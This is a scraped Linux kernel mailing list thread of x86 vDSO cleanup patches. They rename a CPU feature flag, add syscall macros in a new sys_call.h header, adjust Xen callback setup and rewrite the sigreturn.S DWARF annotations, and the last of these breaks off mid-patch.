arch/x86/kernel/cpu/centaur.c | 3 ---
arch/x86/kernel/cpu/common.c | 8 +++++++
arch/x86/kernel/cpu/intel.c | 4 +---
arch/x86/kernel/cpu/zhaoxin.c | 4 +---
arch/x86/kernel/fred.c | 2 +-
arch/x86/xen/setup.c | 28 +++++++++++++++---------
arch/x86/xen/smp_pv.c | 5 ++---
arch/x86/xen/xen-ops.h | 1 -
11 files changed, 42 insertions(+), 31 deletions(-)
diff --git a/arch/x86/Kconfig.cpufeatures b/arch/x86/Kconfig.cpufeatures
index 733d5aff2456..423ac795baa7 100644
--- a/arch/x86/Kconfig.cpufeatures
+++ b/arch/x86/Kconfig.cpufeatures
@@ -56,6 +56,10 @@ config X86_REQUIRED_FEATURE_MOVBE
def_bool y
depends on MATOM
+config X86_REQUIRED_FEATURE_SYSFAST32
+ def_bool y
+ depends on X86_64 && !X86_FRED
+
config X86_REQUIRED_FEATURE_CPUID
def_bool y
depends on X86_64
@@ -120,6 +124,10 @@ config X86_DISABLED_FEATURE_CENTAUR_MCR
def_bool y
depends on X86_64
+config X86_DISABLED_FEATURE_SYSCALL32
+ def_bool y
+ depends on !X86_64
+
config X86_DISABLED_FEATURE_PCID
def_bool y
depends on !X86_64
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index 2a15634bbe75..7b1c0f16e511 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -52,13 +52,9 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
-#ifdef BUILD_VDSO32_64
/* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
- ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSENTER32, \
- SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
-#else
- ALTERNATIVE "", SYSENTER_SEQUENCE, X86_FEATURE_SEP
-#endif
+ ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSFAST32, \
+ SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
/* Enter using int $0x80 */
int $0x80
diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
index c3b53beb1300..63b0f9aa9b3e 100644
--- a/arch/x86/include/asm/cpufeatures.h
+++ b/arch/x86/include/asm/cpufeatures.h
@@ -84,7 +84,7 @@
#define X86_FEATURE_PEBS ( 3*32+12) /* "pebs" Precise-Event Based Sampling */
#define X86_FEATURE_BTS ( 3*32+13) /* "bts" Branch Trace Store */
#define X86_FEATURE_SYSCALL32 ( 3*32+14) /* syscall in IA32 userspace */
-#define X86_FEATURE_SYSENTER32 ( 3*32+15) /* sysenter in IA32 userspace */
+#define X86_FEATURE_SYSFAST32 ( 3*32+15) /* sysenter/syscall in IA32 userspace */
#define X86_FEATURE_REP_GOOD ( 3*32+16) /* "rep_good" REP microcode works well */
#define X86_FEATURE_AMD_LBR_V2 ( 3*32+17) /* "amd_lbr_v2" AMD Last Branch Record Extension Version 2 */
#define X86_FEATURE_CLEAR_CPU_BUF ( 3*32+18) /* Clear CPU buffers using VERW */
diff --git a/arch/x86/kernel/cpu/centaur.c b/arch/x86/kernel/cpu/centaur.c
index a3b55db35c96..9833f837141c 100644
--- a/arch/x86/kernel/cpu/centaur.c
+++ b/arch/x86/kernel/cpu/centaur.c
@@ -102,9 +102,6 @@ static void early_init_centaur(struct cpuinfo_x86 *c)
(c->x86 >= 7))
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#endif
if (c->x86_power & (1 << 8)) {
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
set_cpu_cap(c, X86_FEATURE_NONSTOP_TSC);
diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
index e7ab22fce3b5..1c3261cae40c 100644
--- a/arch/x86/kernel/cpu/common.c
+++ b/arch/x86/kernel/cpu/common.c
@@ -1068,6 +1068,9 @@ void get_cpu_cap(struct cpuinfo_x86 *c)
init_scattered_cpuid_features(c);
init_speculation_control(c);
+ if (IS_ENABLED(CONFIG_X86_64) || cpu_has(c, X86_FEATURE_SEP))
+ set_cpu_cap(c, X86_FEATURE_SYSFAST32);
+
/*
* Clear/Set all flags overridden by options, after probe.
* This needs to happen each time we re-probe, which may happen
@@ -1813,6 +1816,11 @@ static void __init early_identify_cpu(struct cpuinfo_x86 *c)
* that it can't be enabled in 32-bit mode.
*/
setup_clear_cpu_cap(X86_FEATURE_PCID);
+
+ /*
+ * Never use SYSCALL on a 32-bit kernel
+ */
+ setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
#endif
/*
diff --git a/arch/x86/kernel/cpu/intel.c b/arch/x86/kernel/cpu/intel.c
index 98ae4c37c93e..646ff33c4651 100644
--- a/arch/x86/kernel/cpu/intel.c
+++ b/arch/x86/kernel/cpu/intel.c
@@ -236,9 +236,7 @@ static void early_init_intel(struct cpuinfo_x86 *c)
clear_cpu_cap(c, X86_FEATURE_PSE);
}
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#else
+#ifndef CONFIG_X86_64
/* Netburst reports 64 bytes clflush size, but does IO in 128 bytes */
if (c->x86 == 15 && c->x86_cache_alignment == 64)
c->x86_cache_alignment = 128;
diff --git a/arch/x86/kernel/cpu/zhaoxin.c b/arch/x86/kernel/cpu/zhaoxin.c
index 89b1c8a70fe8..031379b7d4fa 100644
--- a/arch/x86/kernel/cpu/zhaoxin.c
+++ b/arch/x86/kernel/cpu/zhaoxin.c
@@ -59,9 +59,7 @@ static void early_init_zhaoxin(struct cpuinfo_x86 *c)
{
if (c->x86 >= 0x6)
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#endif
+
if (c->x86_power & (1 << 8)) {
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
set_cpu_cap(c, X86_FEATURE_NONSTOP_TSC);
diff --git a/arch/x86/kernel/fred.c b/arch/x86/kernel/fred.c
index 816187da3a47..e736b19e18de 100644
--- a/arch/x86/kernel/fred.c
+++ b/arch/x86/kernel/fred.c
@@ -68,7 +68,7 @@ void cpu_init_fred_exceptions(void)
idt_invalidate();
/* Use int $0x80 for 32-bit system calls in FRED mode */
- setup_clear_cpu_cap(X86_FEATURE_SYSENTER32);
+ setup_clear_cpu_cap(X86_FEATURE_SYSFAST32);
setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
}
diff --git a/arch/x86/xen/setup.c b/arch/x86/xen/setup.c
index 3823e52aef52..ac8021c3a997 100644
--- a/arch/x86/xen/setup.c
+++ b/arch/x86/xen/setup.c
@@ -990,13 +990,6 @@ static int register_callback(unsigned type, const void *func)
return HYPERVISOR_callback_op(CALLBACKOP_register, &callback);
}
-void xen_enable_sysenter(void)
-{
- if (cpu_feature_enabled(X86_FEATURE_SYSENTER32) &&
- register_callback(CALLBACKTYPE_sysenter, xen_entry_SYSENTER_compat))
- setup_clear_cpu_cap(X86_FEATURE_SYSENTER32);
-}
-
void xen_enable_syscall(void)
{
int ret;
@@ -1008,11 +1001,27 @@ void xen_enable_syscall(void)
mechanism for syscalls. */
}
- if (cpu_feature_enabled(X86_FEATURE_SYSCALL32) &&
- register_callback(CALLBACKTYPE_syscall32, xen_entry_SYSCALL_compat))
+ if (!cpu_feature_enabled(X86_FEATURE_SYSFAST32))
+ return;
+
+ if (cpu_feature_enabled(X86_FEATURE_SYSCALL32)) {
+ /* Use SYSCALL32 */
+ ret = register_callback(CALLBACKTYPE_syscall32,
+ xen_entry_SYSCALL_compat);
+
+ } else {
+ /* Use SYSENTER32 */
+ ret = register_callback(CALLBACKTYPE_sysenter,
+ xen_entry_SYSENTER_compat);
+ }
+
+ if (ret) {
setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
+ setup_clear_cpu_cap(X86_FEATURE_SYSFAST32);
+ }
}
+
static void __init xen_pvmmu_arch_setup(void)
{
HYPERVISOR_vm_assist(VMASST_CMD_enable, VMASST_TYPE_writable_pagetables);
@@ -1022,7 +1031,6 @@ static void __init xen_pvmmu_arch_setup(void)
register_callback(CALLBACKTYPE_failsafe, xen_failsafe_callback))
BUG();
- xen_enable_sysenter();
xen_enable_syscall();
}
diff --git a/arch/x86/xen/smp_pv.c b/arch/x86/xen/smp_pv.c
index 9bb8ff8bff30..c40f326f0c3a 100644
--- a/arch/x86/xen/smp_pv.c
+++ b/arch/x86/xen/smp_pv.c
@@ -65,10 +65,9 @@ static void cpu_bringup(void)
touch_softlockup_watchdog();
/* PVH runs in ring 0 and allows us to do native syscalls. Yay! */
- if (!xen_feature(XENFEAT_supervisor_mode_kernel)) {
- xen_enable_sysenter();
+ if (!xen_feature(XENFEAT_supervisor_mode_kernel))
xen_enable_syscall();
- }
+
cpu = smp_processor_id();
identify_secondary_cpu(cpu);
set_cpu_sibling_map(cpu);
diff --git a/arch/x86/xen/xen-ops.h b/arch/x86/xen/xen-ops.h
index 090349baec09..f6c331b20fad 100644
--- a/arch/x86/xen/xen-ops.h
+++ b/arch/x86/xen/xen-ops.h
@@ -60,7 +60,6 @@ phys_addr_t __init xen_find_free_area(phys_addr_t size);
char * __init xen_memory_setup(void);
void __init xen_arch_setup(void);
void xen_banner(void);
-void xen_enable_sysenter(void);
void xen_enable_syscall(void);
void xen_vcpu_restore(void);
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:42 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
Abstract out the calling of true system calls from the vdso into
macros.
It has been a very long time since gcc did not allow %ebx or %ebp in
inline asm in 32-bit PIC mode; remove the corresponding hacks.
Remove the use of memory output constraints in gettimeofday.h in favor
of "memory" clobbers. The resulting code is identical for the current
use cases, as the system call is usually a terminal fallback anyway,
and it merely complicates the macroization.
This patch adds only a handful of more lines of code than it removes,
and in fact could be made substantially smaller by removing the macros
for the argument counts that aren't currently used, however, it seems
better to be general from the start.
[ v3: remove stray comment from prototyping; remove VDSO_SYSCALL6()
since it would require special handling on 32 bits and is
currently unused. (Uros Bizjak).
Indent nested preprocessor directives. ]
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/include/asm/vdso/gettimeofday.h | 108 ++---------------------
arch/x86/include/asm/vdso/sys_call.h | 103 +++++++++++++++++++++
2 files changed, 111 insertions(+), 100 deletions(-)
create mode 100644 arch/x86/include/asm/vdso/sys_call.h
diff --git a/arch/x86/include/asm/vdso/gettimeofday.h b/arch/x86/include/asm/vdso/gettimeofday.h
index 73b2e7ee8f0f..3cf214cc4a75 100644
--- a/arch/x86/include/asm/vdso/gettimeofday.h
+++ b/arch/x86/include/asm/vdso/gettimeofday.h
@@ -18,6 +18,7 @@
#include <asm/msr.h>
#include <asm/pvclock.h>
#include <clocksource/hyperv_timer.h>
+#include <asm/vdso/sys_call.h>
#define VDSO_HAS_TIME 1
@@ -53,130 +54,37 @@ extern struct ms_hyperv_tsc_page hvclock_page
__attribute__((visibility("hidden")));
#endif
-#ifndef BUILD_VDSO32
-
static __always_inline
long clock_gettime_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
{
- long ret;
-
- asm ("syscall" : "=a" (ret), "=m" (*_ts) :
- "0" (__NR_clock_gettime), "D" (_clkid), "S" (_ts) :
- "rcx", "r11");
-
- return ret;
+ return VDSO_SYSCALL2(clock_gettime,64,_clkid,_ts);
}
static __always_inline
long gettimeofday_fallback(struct __kernel_old_timeval *_tv,
struct timezone *_tz)
{
- long ret;
-
- asm("syscall" : "=a" (ret) :
- "0" (__NR_gettimeofday), "D" (_tv), "S" (_tz) : "memory");
-
- return ret;
+ return VDSO_SYSCALL2(gettimeofday,,_tv,_tz);
}
static __always_inline
long clock_getres_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
{
- long ret;
-
- asm ("syscall" : "=a" (ret), "=m" (*_ts) :
- "0" (__NR_clock_getres), "D" (_clkid), "S" (_ts) :
- "rcx", "r11");
-
- return ret;
+ return VDSO_SYSCALL2(clock_getres,_time64,_clkid,_ts);
}
-#else
-
-static __always_inline
-long clock_gettime_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
-{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_gettime64), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
+#ifndef CONFIG_X86_64
static __always_inline
long clock_gettime32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_gettime), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
-
-static __always_inline
-long gettimeofday_fallback(struct __kernel_old_timeval *_tv,
- struct timezone *_tz)
-{
- long ret;
-
- asm(
- "mov %%ebx, %%edx \n"
- "mov %2, %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret)
- : "0" (__NR_gettimeofday), "g" (_tv), "c" (_tz)
- : "memory", "edx");
-
- return ret;
+ return VDSO_SYSCALL2(clock_gettime,,_clkid,_ts);
}
static __always_inline long
-clock_getres_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
-{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_getres_time64), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
-
-static __always_inline
-long clock_getres32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
+clock_getres32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_getres), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
+ return VDSO_SYSCALL2(clock_getres,,_clkid,_ts);
}
#endif
diff --git a/arch/x86/include/asm/vdso/sys_call.h b/arch/x86/include/asm/vdso/sys_call.h
new file mode 100644
index 000000000000..dcfd17c6dd57
--- /dev/null
+++ b/arch/x86/include/asm/vdso/sys_call.h
@@ -0,0 +1,103 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Macros for issuing an inline system call from the vDSO.
+ */
+
+#ifndef X86_ASM_VDSO_SYS_CALL_H
+#define X86_ASM_VDSO_SYS_CALL_H
+
+#include <linux/compiler.h>
+#include <asm/cpufeatures.h>
+#include <asm/alternative.h>
+
+#ifdef CONFIG_X86_64
+# define __sys_instr "syscall"
+# define __sys_clobber "rcx", "r11", "memory"
+# define __sys_nr(x,y) __NR_ ## x
+# define __sys_reg1 "rdi"
+# define __sys_reg2 "rsi"
+# define __sys_reg3 "rdx"
+# define __sys_reg4 "r10"
+# define __sys_reg5 "r8"
+#else
+# define __sys_instr "call __kernel_vsyscall"
+# define __sys_clobber "memory"
+# define __sys_nr(x,y) __NR_ ## x ## y
+# define __sys_reg1 "ebx"
+# define __sys_reg2 "ecx"
+# define __sys_reg3 "edx"
+# define __sys_reg4 "esi"
+# define __sys_reg5 "edi"
+#endif
+
+/*
+ * Example usage:
+ *
+ * result = VDSO_SYSCALL3(foo,64,x,y,z);
+ *
+ * ... calls foo(x,y,z) on 64 bits, and foo64(x,y,z) on 32 bits.
+ *
+ * VDSO_SYSCALL6() is currently missing, because it would require
+ * special handling for %ebp on 32 bits when the vdso is compiled with
+ * frame pointers enabled (the default on 32 bits.) Add it as a special
+ * case when and if it becomes necessary.
+ */
+#define _VDSO_SYSCALL(name,suf32,...) \
+ ({ \
+ long _sys_num_ret = __sys_nr(name,suf32); \
+ asm_inline volatile( \
+ __sys_instr \
+ : "+a" (_sys_num_ret) \
+ : __VA_ARGS__ \
+ : __sys_clobber); \
+ _sys_num_ret; \
+ })
+
+#define VDSO_SYSCALL0(name,suf32) \
+ _VDSO_SYSCALL(name,suf32)
+#define VDSO_SYSCALL1(name,suf32,a1) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1)); \
+ })
+#define VDSO_SYSCALL2(name,suf32,a1,a2) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2)); \
+ })
+#define VDSO_SYSCALL3(name,suf32,a1,a2,a3) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3)); \
+ })
+#define VDSO_SYSCALL4(name,suf32,a1,a2,a3,a4) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ register long _sys_arg4 asm(__sys_reg4) = (long)(a4); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3), "r" (_sys_arg4)); \
+ })
+#define VDSO_SYSCALL5(name,suf32,a1,a2,a3,a4,a5) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ register long _sys_arg4 asm(__sys_reg4) = (long)(a4); \
+ register long _sys_arg5 asm(__sys_reg5) = (long)(a5); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3), "r" (_sys_arg4), \
+ "r" (_sys_arg5)); \
+ })
+
+#endif /* X86_VDSO_SYS_CALL_H */
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:41 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The vdso32 sigreturn.S contains open-coded DWARF bytecode, which
includes a hack for gdb to not try to step back to a previous call
instruction when backtracing from a signal handler.
Neither of those are necessary anymore: the backtracing issue is
handled by ".cfi_entry simple" and ".cfi_signal_frame", both of which
have been supported for a very long time now, which allows the
remaining frame to be built using regular .cfi annotations.
Add a few more register offsets to the signal frame just for good
measure.
Replace the nop on fallthrough of the system call (which should never,
ever happen) with a ud2a trap.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vdso32/sigreturn.S | 146 ++++++-------------------
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/kernel/asm-offsets.c | 6 +
3 files changed, 39 insertions(+), 114 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/sigreturn.S b/arch/x86/entry/vdso/vdso32/sigreturn.S
index 965900c6763b..25b0ac4b4bfe 100644
--- a/arch/x86/entry/vdso/vdso32/sigreturn.S
+++ b/arch/x86/entry/vdso/vdso32/sigreturn.S
@@ -1,136 +1,54 @@
/* SPDX-License-Identifier: GPL-2.0 */
#include <linux/linkage.h>
#include <asm/unistd_32.h>
+#include <asm/dwarf2.h>
#include <asm/asm-offsets.h>
+.macro STARTPROC_SIGNAL_FRAME sc
+ CFI_STARTPROC simple
+ CFI_SIGNAL_FRAME
+ /* -4 as pretcode has already been popped */
+ CFI_DEF_CFA esp, \sc - 4
+ CFI_OFFSET eip, IA32_SIGCONTEXT_ip
